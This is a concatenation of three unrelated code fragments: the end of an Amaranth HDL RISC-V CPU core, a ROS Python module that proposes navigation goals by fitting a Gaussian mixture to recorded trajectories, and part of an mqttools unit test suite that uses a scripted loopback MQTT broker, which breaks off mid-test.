                    alu.op.eq(ALUOp.ADD)
                ]
            with m.Case(RVOpc.AUIPC):
                m.d.comb += [
                    alu.i0.eq(pc),
                    alu.i1.eq(imm_u(cir)),
                    alu.op.eq(ALUOp.ADD),
                    alu.take4.eq(True)
                ]
        # AGU
        # Don't assert bus request during reset, it's a rude thing to do. Other than
        # that we have the pedal to the metal all the time.
        bus_available = Signal()
        m.d.sync += bus_available.eq(1)
        m.d.comb += self.htrans.eq(bus_available << 1)
        agu_next_addr = Signal(XLEN)
        # These qualifiers are gated on cir_valid and on not currently being in
        # a load/store data phase (during which cir belongs to the *next* insn).
        access_is_load = cir_valid & ~d_dph_active & (opc == RVOpc.LOAD)
        access_is_store = cir_valid & ~d_dph_active & (opc == RVOpc.STORE)
        access_is_loadstore = access_is_load | access_is_store
        # funct3[0] inverts the comparison for BNE/BGE/BGEU.
        take_branch = cir_valid & ~d_dph_active & (opc == RVOpc.BRANCH) & (alu.cmp != funct3[0])
        take_jal = cir_valid & ~d_dph_active & (opc == RVOpc.JAL)
        take_jalr = cir_valid & ~d_dph_active & (opc == RVOpc.JALR)
        # Address = base + immediate (+/- 4 correction applied separately below).
        agu_op0 = Signal(XLEN)
        agu_op1 = Signal(XLEN)
        agu_offs = Signal(XLEN)
        with m.If(access_is_load):
            m.d.comb += [agu_op0.eq(rs1), agu_op1.eq(imm_i(cir))]
        with m.Elif(access_is_store):
            m.d.comb += [agu_op0.eq(rs1), agu_op1.eq(imm_s(cir))]
        with m.Elif(take_branch):
            m.d.comb += [agu_op0.eq(pc), agu_op1.eq(imm_b(cir))]
        with m.Elif(take_jal):
            m.d.comb += [agu_op0.eq(pc), agu_op1.eq(imm_j(cir))]
        with m.Elif(take_jalr):
            m.d.comb += [agu_op0.eq(rs1), agu_op1.eq(imm_i(cir))]
        with m.Else():
            m.d.comb += [agu_op0.eq(pc), agu_op1.eq(0)]
        # Offset of +/-4 applied via third adder input (which tools will likely implement as carry-save)
        # -4 for taken branch/JAL (pc is one fetch ahead), +4 for sequential
        # fetch, 0 for load/store addresses and JALR targets.
        m.d.comb += agu_offs.eq(Cat(
            C(0, 2),
            ((take_branch | take_jal) & ~access_is_loadstore) | ~(access_is_loadstore | take_jalr),
            Repl((take_branch | take_jal) & ~access_is_loadstore, 29)
        ))
        m.d.comb += agu_next_addr.eq(agu_op0 + agu_op1 + agu_offs)
        # Generate address-phase request
        m.d.comb += self.haddr.eq(agu_next_addr)
        with m.If(access_is_loadstore):
            m.d.comb += [
                self.hwrite.eq(access_is_store),
                self.hsize.eq(funct3[:2])
            ]
        with m.Else():
            m.d.comb += [
                self.hsize.eq(2)
            ]
        # Update PC and track bus transfer status
        with m.If(bus_available & self.hready):
            with m.If(~access_is_loadstore):
                # Force PC alignment, since we don't support traps
                m.d.sync += pc.eq(agu_next_addr & -4)
            m.d.sync += [
                i_dph_active.eq(self.htrans[1] & ~access_is_loadstore),
                # Note d_dph_active term stops the CIR from being marked as invalid on
                # second cycle of a load/store dphase, since it's not consumed during this
                # time (it is the CIR of the *next* instruction)
                cir_valid.eq((i_dph_active | d_dph_active) & ~(take_branch | take_jal | take_jalr))
            ]
            m.d.sync += [
                d_dph_active.eq(self.htrans[1] & access_is_loadstore),
                d_dph_addr.eq(self.haddr[:2]),
                d_dph_size.eq(self.hsize[:2]),
                d_dph_write.eq(self.hwrite),
                d_dph_signed.eq(~funct3[2])
            ]
        # Store data shifter
        # Unaligned stores behave correctly as long as you don't do them
        # (low byte/halfword is replicated into the addressed lanes).
        with m.Switch(d_dph_addr):
            with m.Case(0):
                m.d.comb += self.hwdata.eq(rs2)
            with m.Case(1):
                m.d.comb += self.hwdata.eq(Cat(rs2[:8], rs2[:8], rs2[16:]))
            with m.Case(2):
                m.d.comb += self.hwdata.eq(Cat(rs2[:16], rs2[:16]))
            with m.Case(3):
                m.d.comb += self.hwdata.eq(Cat(rs2[:24], rs2[:8]))
        # Register file
        m.submodules.regfile = regfile = Hazard2Regfile()
        m.d.comb += [
            # During load/store, the CIR is updated during cycle n, and the register
            # file is read for next instruction on cycle n + 1, so delay addr using CIR.
            regfile.raddr1.eq(Mux(d_dph_active, cir_rs1, self.hrdata[15:20])),
            regfile.raddr2.eq(Mux(d_dph_active, cir_rs2, self.hrdata[20:25])),
            regfile.ren.eq(~(access_is_loadstore | stall)),
            rs1.eq(regfile.rdata1),
            rs2.eq(regfile.rdata2)
        ]
        # Writeback: ALU results commit at end of D/X; load data commits at end
        # of the load's data phase, using the rd captured when cir advanced.
        reg_write_alu = cir_valid & ~d_dph_active & ~stall & (
            (opc == RVOpc.OP) | (opc == RVOpc.OP_IMM) | (opc == RVOpc.JAL) |
            (opc == RVOpc.JALR) | (opc == RVOpc.LUI) | (opc == RVOpc.AUIPC))
        reg_write_load = d_dph_active & ~(stall | d_dph_write)
        load_rd = Signal(cir_rd.shape())
        with m.If(~stall):
            m.d.sync += load_rd.eq(cir_rd)
        m.d.comb += [
            regfile.waddr.eq(Mux(reg_write_load, load_rd, cir_rd)),
            regfile.wdata.eq(Mux(reg_write_load, load_rdata, alu.o)),
            regfile.wen.eq(reg_write_load | reg_write_alu)
        ]
        return m
|
22,032 | 9e32babb06239c99321508527ea8d7db926a027c | #!/usr/bin/env python3
import rospy
import rospkg
import math
import yaml
import os
import numpy as np
from sklearn.mixture import GaussianMixture
class TrajAnalyzer(object):
    """
    Analyses recorded trajectory data and proposes likely goal locations.

    All data is pulled as a list of individual trajectories; goal locations
    are estimated by fitting a Gaussian mixture model to the pooled (x, y)
    points and are written to the package config folder on construction.

    keyword_arguments
    -----------------
    pkg: string
        ROS package that holds the data (default "sdpp_explore")
    sub_folder: string
        sub-folder of the package containing trajectory files
    int_goal_proposals: int
        a proposed number of goal locations in a space
    static_map: nav_msgs/OccupancyGrid
        world map for use with graphing. if empty no map will be used
    traj_data_config: dict
        optional kwargs forwarded to TrajDataInterface

    attributes
    ----------
    data_interface: TrajDataInterface
        loader for trajectory YAML files
    goal_interface: GoalProposalInterface
        writer for proposed goal locations

    methods
    -------
    #TODO (60) traj_proposals()
        return an array of Gaussian models of size num_goal_proposals
        using GMM
    #TODO (120) traj_smoothing()
        proposed method for removing walking data from traj_array
    #TODO (45) proposal_graph(goals)
        take proposed goals and show graph of locations. use seaborn it looks nice
    #TODO (15) write_goals(name, to_file, to_param)
        write goals to config folder or param server based on arguments
    """
    def __init__(self, static_map, **config):
        # NOTE: construction has side effects — it loads all trajectory data,
        # fits a GMM and writes goals.yaml via GoalProposalInterface.
        self.pkg = "sdpp_explore"
        self.sub_folder = "/data/"
        self.int_goal_proposals = 5
        self.static_map = static_map
        # allow any of the defaults above to be overridden via kwargs
        self.__dict__.update(config)
        if "traj_data_config" in config:
            traj_data_config = config["traj_data_config"]
            # forward nested config dict as kwargs to the data interface
            self.data_interface = TrajDataInterface(**traj_data_config)
        else:
            self.data_interface = TrajDataInterface()
        goal_prop_config = {"pkg": "sdpp_explore"}
        self.goal_interface = GoalProposalInterface(**goal_prop_config)
        goal_loc = self.process_0()
        self.goal_interface.save_goals(goal_loc)
    def process_0(self):
        """
        Initial goal-proposal pipeline: load, flatten, fit GMM.

        Returns
        -------
        numpy.ndarray
            component means of the fitted mixture (goal locations)
        """
        raw_data = self.pull_data(self.sub_folder)
        prepped_data = self._prep_data(raw_data)
        print(len(prepped_data))
        # NOTE(review): hard-codes 5 components instead of using
        # self.int_goal_proposals — confirm whether this is intended.
        gmm = GaussianMixture(5)
        gmm.fit(prepped_data)
        return gmm.means_
    def traj_proposals(self, data, int_goal_proposals = 5):
        # Fit a GMM with the requested component count and return its means.
        gmm = GaussianMixture(int_goal_proposals)
        gmm.fit(data)
        return gmm.means_
    def traj_smoothing(self):
        # TODO: proposed method for removing walking data (not implemented)
        pass
    def proposal_graph(self):
        # TODO: visualise proposed goals (not implemented)
        pass
    def pull_data(self, sub_folder):
        """
        wrapping function for TrajDataInterface class to pull data

        Parameters
        ----------
        sub_folder : str
            sub folder within package to pull data from

        Returns
        -------
        list
            list of raw trajectories
        """
        data = self.data_interface.load_files_subdirect(sub_folder)
        return data
    def _prep_data(self, data):
        # Convert raw trajectories (dicts holding "list_odom") into a flat
        # list of [x, y] points suitable for GMM fitting.
        list_trajectories_poses = []
        for traj in data:
            list_poses = []
            for odom in traj["list_odom"]:
                list_poses.append(self._pose_from_odom(odom))
            list_trajectories_poses.append(list_poses)
        prepped_data = self._XY_list(list_trajectories_poses)
        return prepped_data
    def _XY_list(self, data):
        # Flatten per-trajectory [x, y, z] poses into one [x, y] point list
        # (z is dropped).
        list_XY = []
        for traj in data:
            for time_step in traj:
                list_XY.append([time_step[0], time_step[1]])
        return list_XY
    def _pose_from_odom(self, odom):
        """
        takes nav_msg/odometry and extracts [x, y, z] pose

        Parameters
        ----------
        odom : nav_msgs/odometry
            ROS odometry msg

        Returns
        -------
        list
            list of x, y, z pose
        """
        pose = odom.pose.pose.position
        return [pose.x, pose.y, pose.z]
    def _twist_from_odom(self, odom):
        """
        takes nav_msg/odometry and extracts [x, y, z] velocity

        Parameters
        ----------
        odom : nav_msgs/odometry
            ROS odometry msg

        Returns
        -------
        list
            list of x, y, z velocity
        """
        twist = odom.twist.twist.linear
        return [twist.x, twist.y, twist.z]
class GoalProposalInterface(object):
    """Persist proposed goal locations to a ROS package's config folder.

    Keyword Arguments
    -----------------
    pkg : str
        ROS package whose ``config/`` folder receives the goals file
        (default ``"sdpp_explore"``).
    """

    def __init__(self, **configs):
        self.pkg = "sdpp_explore"
        # allow callers to override any attribute (e.g. pkg) via kwargs
        self.__dict__.update(configs)

    def save_goals(self, goals):
        """Write goal locations to ``<pkg>/config/goals.yaml``.

        Parameters
        ----------
        goals : numpy.ndarray
            Array of goal coordinates; converted with ``tolist()`` so YAML
            gets plain Python lists rather than numpy types.
        """
        print(goals)
        pkg_path = self._pkg_path(self.pkg)
        pathname = pkg_path + "/config/" + "goals.yaml"
        self._save_data_yaml(goals.tolist(), pathname)

    def _save_data_yaml(self, data, pathname):
        """
        saves data as a yaml file to the given pathname

        Parameters
        ----------
        data : list or dict
            the data to be written
        pathname : str
            full filepath to save yaml too
        """
        pathname = self._yaml_extension(pathname)
        with open(pathname, "w") as outfile:
            yaml.dump(data, outfile, default_flow_style=False)

    def _pkg_path(self, pkg):
        """
        returns the file path of a package.

        Parameters
        ----------
        pkg: string
            name of package to get filepath for

        Returns
        ------
        pkg_path: string
            the absolute path of desired package config folder
        """
        return rospkg.RosPack().get_path(pkg)

    def _yaml_extension(self, string):
        """
        add ".yaml" extension to string if needed

        Parameters
        ----------
        string: str
            input filename for checking

        Returns
        ------
        string: str
            filename with .yaml extension
        """
        # append only when missing; already-suffixed names pass through
        if not string.endswith(".yaml"):
            string += ".yaml"
        return string
class TrajDataInterface(object):
    """
    Interface class designed to unify loading and saving of traj data objects
    (stored as YAML files inside a ROS package).

    keyword arguments
    -----------------
    pkg: string
        ROS package from where to load and save data from
        (default "sdpp_explore")
    """
    def __init__(self, **configs):
        """
        initialize the object. currently only keeps track of pkg location
        """
        self.pkg = "sdpp_explore"
        # allow callers to override any attribute (e.g. pkg) via kwargs
        self.__dict__.update(configs)

    def set_package(self, pkg):
        """
        set the package attribute. used for finding relative pathing

        Parameters
        ----------
        pkg : str
            name of ROS package
        """
        self.pkg = pkg

    def load_files_subdirect(self, subdirect):
        """
        load the contents of every YAML file found (recursively) under
        ``<pkg>/<subdirect>``

        Parameters
        ----------
        subdirect : str
            sub directory within the package to pull data from

        Returns
        -------
        list
            parsed contents of each YAML file, one entry per file
        """
        # reuse the listing helper instead of duplicating its traversal logic
        yaml_files = self.list_files_yaml_of_subdirect(subdirect)
        return [self._load_data_yaml(item) for item in yaml_files]

    def list_files_yaml_of_subdirect(self, subdirect):
        """
        lists all the yaml files within a subdirectory of the pkg attribute

        Parameters
        ----------
        subdirect : str
            the name of the subdirectory

        Returns
        -------
        list of str
            paths of all YAML files under the subdirectory
        """
        pkg_path = self._pkg_path(self.pkg)
        all_files = self.list_of_files(pkg_path + subdirect)
        return self._purge_except_yaml(all_files)

    def list_of_files(self, dirname):
        """
        returns array of all file locations within the dirname (recursive)

        Parameters
        ----------
        dirname : str
            directory to search for files in

        Returns
        -------
        list of str
            list of file paths
        """
        all_files = []
        for entry in os.listdir(dirname):
            full_path = os.path.join(dirname, entry)
            if os.path.isdir(full_path):
                # recurse into sub-directories, preserving listdir order
                all_files.extend(self.list_of_files(full_path))
            else:
                all_files.append(full_path)
        return all_files

    def load_file(self, filepath):
        """
        loads and returns the data from a filepath
        currently only supports yaml

        Parameters
        ----------
        filepath : str
            the location of a file (".yaml" appended if missing)

        Returns
        -------
        list or dict
            dictionary or list of data from within file
        """
        # _load_data_yaml normalises the extension itself
        return self._load_data_yaml(filepath)

    def _purge_except_yaml(self, list_files):
        """
        removes all files that do not have yaml extension

        Parameters
        ----------
        list_files : list of str
            list of filepaths to purge

        Returns
        -------
        list of str
            list of filepaths with yaml extension
        """
        return [filepath for filepath in list_files if filepath.endswith(".yaml")]

    def _load_data_yaml(self, pathname):
        """
        open and load yaml file

        Returns
        -------
        list or dict
            contents of yaml file
        """
        pathname = self._yaml_extension(pathname)
        # FullLoader parses the full YAML language while avoiding arbitrary
        # Python object construction (unlike the legacy unsafe loader)
        with open(pathname) as file:
            return yaml.load(file, Loader=yaml.FullLoader)

    def _save_data_yaml(self, data, pathname):
        """
        saves data as a yaml file to the given pathname

        Parameters
        ----------
        data : list or dict
            the data to be written
        pathname : str
            full filepath to save yaml too
        """
        pathname = self._yaml_extension(pathname)
        with open(pathname, "w") as outfile:
            yaml.dump(data, outfile, default_flow_style=False)

    def _yaml_extension(self, string):
        """
        add ".yaml" extension to string if needed

        Parameters
        ----------
        string: str
            input filename for checking

        Returns
        ------
        string: str
            filename with .yaml extension
        """
        if not string.endswith(".yaml"):
            string += ".yaml"
        return string

    def _pkg_path(self, pkg):
        """
        returns the file path of a package.

        Parameters
        ----------
        pkg: string
            name of package to get filepath for

        Returns
        ------
        pkg_path: string
            the absolute path of desired package
        """
        return rospkg.RosPack().get_path(pkg)
22,033 | 06a64f8fa0bfcd60b7b77ae03379440b99069bf2 | import asyncio
import binascii
import logging
import queue
import socket
import sys
import threading
import unittest
from io import StringIO
from unittest.mock import patch
import mqttools
HOST = 'localhost'  # test broker binds to loopback only
PORT = 0  # 0 = let the OS pick a free ephemeral port
class Broker(threading.Thread):
    """Scripted fake MQTT broker used by the tests.

    It replays EXPECTED_DATA_STREAM, a list of (direction, bytes) tuples:
    for 'c2s' entries it reads exactly that many bytes from the client, for
    's2c' entries it writes the bytes to the client. Everything actually
    exchanged is recorded in ACTUAL_DATA_STREAM so tearDown can compare the
    two streams. Class attributes are reset per test by setUp.
    """
    EXPECTED_DATA_INDEX = 0     # cursor into EXPECTED_DATA_STREAM
    EXPECTED_DATA_STREAM = []   # scripted (direction, bytes) exchanges
    ACTUAL_DATA_STREAM = []     # what actually happened, same format
    def __init__(self):
        super().__init__()
        self._listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._listener.bind((HOST, PORT))
        self._listener.listen()
        # signalled once per served client so tests can synchronise teardown
        self._client_closed = queue.Queue()
    @property
    def address(self):
        # (host, port) actually bound — port is OS-assigned (PORT == 0)
        return self._listener.getsockname()[:2]
    def wait_for_client_closed(self):
        # Block (up to 1 s) until serve_client() has finished with a client.
        self._client_closed.get(timeout=1)
    def run(self):
        # Serve clients one at a time, forever (daemon thread in the tests).
        while True:
            print('Broker: Listening for client...')
            self.serve_client(self._listener.accept()[0])
            self._client_closed.put(True)
    def serve_client(self, client):
        print('Broker: Serving client...')
        while self.EXPECTED_DATA_INDEX < len(self.EXPECTED_DATA_STREAM):
            # Expect a client-to-server chunk: read exactly as many bytes as
            # the script says the client should send next.
            _, data = self.EXPECTED_DATA_STREAM[self.EXPECTED_DATA_INDEX]
            size = len(data)
            data = client.recv(size)
            if not data:
                break
            self.EXPECTED_DATA_INDEX += 1
            # print(f'Broker: Received: {data}')
            self.ACTUAL_DATA_STREAM.append(('c2s', data))
            # Then play out any consecutive server-to-client chunks.
            while self.EXPECTED_DATA_INDEX < len(self.EXPECTED_DATA_STREAM):
                direction, data = self.EXPECTED_DATA_STREAM[self.EXPECTED_DATA_INDEX]
                if direction != 's2c':
                    break
                self.EXPECTED_DATA_INDEX += 1
                # print(f'Broker: Sending: {data}')
                client.send(data)
                self.ACTUAL_DATA_STREAM.append(('s2c', data))
        client.close()
class MQTToolsTest(unittest.TestCase):
def setUp(self):
Broker.EXPECTED_DATA_INDEX = 0
Broker.EXPECTED_DATA_STREAM = []
Broker.ACTUAL_DATA_STREAM = []
Broker.CLOSE_AFTER_INDEX = -1
self.broker = Broker()
self.broker.daemon = True
self.broker.start()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.broker.wait_for_client_closed()
self.loop.close()
self.assertEqual(Broker.ACTUAL_DATA_STREAM, Broker.EXPECTED_DATA_STREAM)
def run_until_complete(self, coro):
return self.loop.run_until_complete(coro)
def test_start_stop(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0)
self.run_until_complete(client.start())
self.run_until_complete(client.stop())
def test_empty_context_manager(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
async def manager():
async with mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0):
pass
self.run_until_complete(manager())
def test_subscribe(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# SUBSCRIBE
('c2s', b'\x82\n\x00\x01\x00\x00\x04/a/b\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x01\x00\x00'),
# SUBSCRIBE
('c2s', b'\x82\n\x00\x02\x00\x00\x04/a/c\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x02\x00\x00'),
# SUBSCRIBE with invalid topic
('c2s', b'\x82\x09\x00\x03\x00\x00\x03/a#\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x03\x00\xa2'),
# PUBLISH QoS 0
('s2c', b'\x30\x0a\x00\x04/a/b\x00apa'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0)
self.run_until_complete(client.start())
self.run_until_complete(client.subscribe('/a/b'))
self.run_until_complete(client.subscribe('/a/c'))
with self.assertRaises(mqttools.SubscribeError) as cm:
self.run_until_complete(client.subscribe('/a#'))
self.assertEqual(cm.exception.reason,
mqttools.SubackReasonCode.WILDCARD_SUBSCRIPTIONS_NOT_SUPPORTED)
message = self.run_until_complete(client.messages.get())
self.assertEqual(message.topic, '/a/b')
self.assertEqual(message.message, b'apa')
self.run_until_complete(client.stop())
def test_subscribe_retain_handling_values(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# SUBSCRIBE retain handling 0
('c2s', b'\x82\n\x00\x01\x00\x00\x04/a/b\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x01\x00\x00'),
# SUBSCRIBE retain handling 1
('c2s', b'\x82\n\x00\x02\x00\x00\x04/a/c\x10'),
# SUBACK
('s2c', b'\x90\x04\x00\x02\x00\x00'),
# SUBSCRIBE retain handling 2
('c2s', b'\x82\n\x00\x03\x00\x00\x04/a/d\x20'),
# SUBACK
('s2c', b'\x90\x04\x00\x03\x00\x00'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0)
self.run_until_complete(client.start())
self.run_until_complete(client.subscribe('/a/b', 0))
self.run_until_complete(client.subscribe('/a/c', 1))
self.run_until_complete(client.subscribe('/a/d', 2))
self.run_until_complete(client.stop())
def test_unsubscribe(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# SUBSCRIBE
('c2s', b'\x82\n\x00\x01\x00\x00\x04/a/b\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x01\x00\x00'),
# UNSUBSCRIBE
('c2s', b'\xa2\x09\x00\x02\x00\x00\x04/a/b'),
# UNSUBACK
('s2c', b'\xb0\x04\x00\x02\x00\x00'),
# UNSUBSCRIBE from non-subscribed topic
('c2s', b'\xa2\x09\x00\x03\x00\x00\x04/a/d'),
# UNSUBACK
('s2c', b'\xb0\x04\x00\x03\x00\x11'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0)
self.run_until_complete(client.start())
self.run_until_complete(client.subscribe('/a/b'))
self.run_until_complete(client.unsubscribe('/a/b'))
with self.assertRaises(mqttools.UnsubscribeError) as cm:
self.run_until_complete(client.unsubscribe('/a/d'))
self.assertEqual(cm.exception.reason,
mqttools.UnsubackReasonCode.NO_SUBSCRIPTION_EXISTED)
self.run_until_complete(client.stop())
def test_publish_qos_0(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# PUBLISH
('c2s', b'\x30\x0a\x00\x04/a/b\x00apa'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0)
self.run_until_complete(client.start())
client.publish(mqttools.Message('/a/b', b'apa'))
self.run_until_complete(client.stop())
def test_command_line_publish_qos_0(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
(
'c2s',
b'\x10\x20\x00\x04MQTT\x05\x02\x00<\x03"\x00\n\x00\x10'
b'mqttools_publish'
),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# PUBLISH
('c2s', b'\x30\x0a\x00\x04/a/b\x00apa'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
argv = [
'mqttools',
'publish',
'--host', self.broker.address[0],
'--port', str(self.broker.address[1]),
'--client-id', 'mqttools_publish',
'/a/b',
'617061'
]
stdout = StringIO()
with patch('sys.stdout', stdout):
with patch('sys.argv', argv):
mqttools.main()
self.assertIn('Published 1 message(s) in', stdout.getvalue())
def test_command_line_publish_qos_0_generate_message(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
(
'c2s',
b'\x10\x20\x00\x04MQTT\x05\x02\x00<\x03"\x00\n\x00\x10'
b'mqttools_publish'
),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# PUBLISH
('c2s', b'\x30\x11\x00\x04/a/b\x000\xa5\xa5\xa5\xa5\xa5\xa5\xa5\xa5\xa5'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
argv = [
'mqttools',
'publish',
'--host', self.broker.address[0],
'--port', str(self.broker.address[1]),
'--client-id', 'mqttools_publish',
'--size', '10',
'/a/b'
]
stdout = StringIO()
with patch('sys.stdout', stdout):
with patch('sys.argv', argv):
mqttools.main()
self.assertIn('Published 1 message(s) in', stdout.getvalue())
def test_command_line_publish_qos_0_generate_short_message(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
(
'c2s',
b'\x10\x20\x00\x04MQTT\x05\x02\x00<\x03"\x00\n\x00\x10'
b'mqttools_publish'
),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x001'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
argv = [
'mqttools',
'publish',
'--host', self.broker.address[0],
'--port', str(self.broker.address[1]),
'--client-id', 'mqttools_publish',
'--count', '11',
'--size', '1',
'/a/b'
]
stdout = StringIO()
with patch('sys.stdout', stdout):
with patch('sys.argv', argv):
mqttools.main()
self.assertIn('Published 11 message(s) in', stdout.getvalue())
def test_publish_topic_alias(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK with topic alias 5
('s2c', b'\x20\x06\x00\x00\x03\x22\x00\x05'),
# PUBLISH to set alias
(
'c2s',
b'\x30\x2c\x00\x12/test/mqttools/foo\x03\x23\x00\x01'
b'sets-alias-in-broker'
),
# PUBLISH using alias
('c2s', b'\x30\x1a\x00\x00\x03\x23\x00\x01published-with-alias'),
# PUBLISH without alias
('c2s', b'\x30\x24\x00\x12/test/mqttools/fie\x00not-using-alias'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
topic_aliases=[
'/test/mqttools/foo'
],
topic_alias_maximum=0,
keep_alive_s=0)
self.run_until_complete(client.start())
client.publish(mqttools.Message('/test/mqttools/foo', b'sets-alias-in-broker'))
client.publish(mqttools.Message('/test/mqttools/foo', b'published-with-alias'))
client.publish(mqttools.Message('/test/mqttools/fie', b'not-using-alias'))
self.run_until_complete(client.stop())
def test_use_all_topic_aliases(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK with topic alias 1
('s2c', b'\x20\x06\x00\x00\x03\x22\x00\x01'),
# PUBLISH to set alias
('c2s', b'\x30\x0d\x00\x04/foo\x03\x23\x00\x01apa'),
# PUBLISH, no alias available
('c2s', b'\x30\x0a\x00\x04/bar\x00cat'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
topic_aliases=[
'/foo'
],
topic_alias_maximum=0,
keep_alive_s=0)
self.run_until_complete(client.start())
client.publish(mqttools.Message('/foo', b'apa'))
client.publish(mqttools.Message('/bar', b'cat'))
self.run_until_complete(client.stop())
def test_connack_unspecified_error(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK with unspecified error
('s2c', b'\x20\x03\x00\x80\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
topic_alias_maximum=0,
connect_delays=[],
keep_alive_s=0)
with self.assertRaises(mqttools.ConnectError) as cm:
self.run_until_complete(client.start())
self.assertEqual(str(cm.exception), 'UNSPECIFIED_ERROR(128)')
def test_receive_topic_alias(self):
    """Incoming PUBLISH topic aliases are resolved by the client.

    Messages with an unknown alias (never set) or an alias above the
    advertised maximum (5) are dropped; only the alias-setting PUBLISH and
    the subsequent alias-only PUBLISH are delivered to `client.messages`.
    """
    Broker.EXPECTED_DATA_STREAM = [
        # CONNECT with topic alias 5
        (
            'c2s',
            b'\x10\x13\x00\x04MQTT\x05\x02\x00\x00\x03\x22\x00\x05\x00\x03bar'
        ),
        # CONNACK
        ('s2c', b'\x20\x03\x00\x00\x00'),
        # SUBSCRIBE
        ('c2s', b'\x82\x18\x00\x01\x00\x00\x12/test/mqttools/foo\x00'),
        # SUBACK
        ('s2c', b'\x90\x04\x00\x01\x00\x00'),
        # PUBLISH using an unknown alias 1
        (
            's2c',
            b'\x30\x22\x00\x00\x03\x23\x00\x01published-with-unknown-alias'
        ),
        # PUBLISH using alias an invalid alias 6
        (
            's2c',
            b'\x30\x34\x00\x12/test/mqttools/foo\x03\x23\x00\x06'
            b'sets-invalid-alias-in-client'
        ),
        # PUBLISH to set alias
        (
            's2c',
            b'\x30\x2c\x00\x12/test/mqttools/foo\x03\x23\x00\x01'
            b'sets-alias-in-client'
        ),
        # PUBLISH using alias
        ('s2c', b'\x30\x1a\x00\x00\x03\x23\x00\x01published-with-alias'),
        # DISCONNECT
        ('c2s', b'\xe0\x02\x00\x00')
    ]
    client = mqttools.Client(*self.broker.address,
                             'bar',
                             topic_alias_maximum=5,
                             keep_alive_s=0)
    self.run_until_complete(client.start())
    self.run_until_complete(client.subscribe('/test/mqttools/foo'))
    # First delivered message: the alias-setting PUBLISH.
    message = self.run_until_complete(client.messages.get())
